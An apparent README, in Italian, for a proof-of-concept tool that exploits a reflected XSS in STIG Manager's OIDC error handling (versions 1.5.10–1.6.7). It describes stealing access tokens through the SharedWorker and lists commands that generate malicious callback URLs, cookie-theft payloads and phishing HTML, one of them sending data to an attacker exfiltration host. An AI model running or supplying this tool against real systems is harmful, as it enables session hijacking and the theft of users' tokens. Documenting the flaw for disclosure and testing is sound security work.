
Generatore di proof-of-concept per lo sfruttamento di XSS riflessa nell'autenticazione OIDC di STIG Manager, che consente il furto di token di sessione tramite URL di callback appositamente costruiti e output HTML di phishing.
Proof of Concept concettuale per la vulnerabilità di Cross-Site Scripting (XSS) riflesso in STIG Manager versioni 1.5.10 fino a 1.6.7.
Una vulnerabilità di XSS riflesso esiste nel codice di gestione degli errori di autenticazione OIDC dell'applicazione web STIG Manager. I parametri query error e error_description restituiti dal provider OIDC vengono scritti direttamente nel DOM tramite innerHTML senza escapamento HTML. Un attaccante che può creare un URL malevolo e convincere un utente a seguirla può eseguire JavaScript arbitrario nel contesto dell'applicazione.
La vulnerabilità è più grave quando l'utente preso di mira ha una sessione STIG Manager attiva in un'altra scheda del browser — il codice iniettato può comunicare con lo SharedWorker che gestisce il token di accesso, abilitando richieste API autenticate per conto della vittima.
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html
# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
Questo strumento è fornito solo per scopi educativi e ricerca sulla sicurezza autorizzata.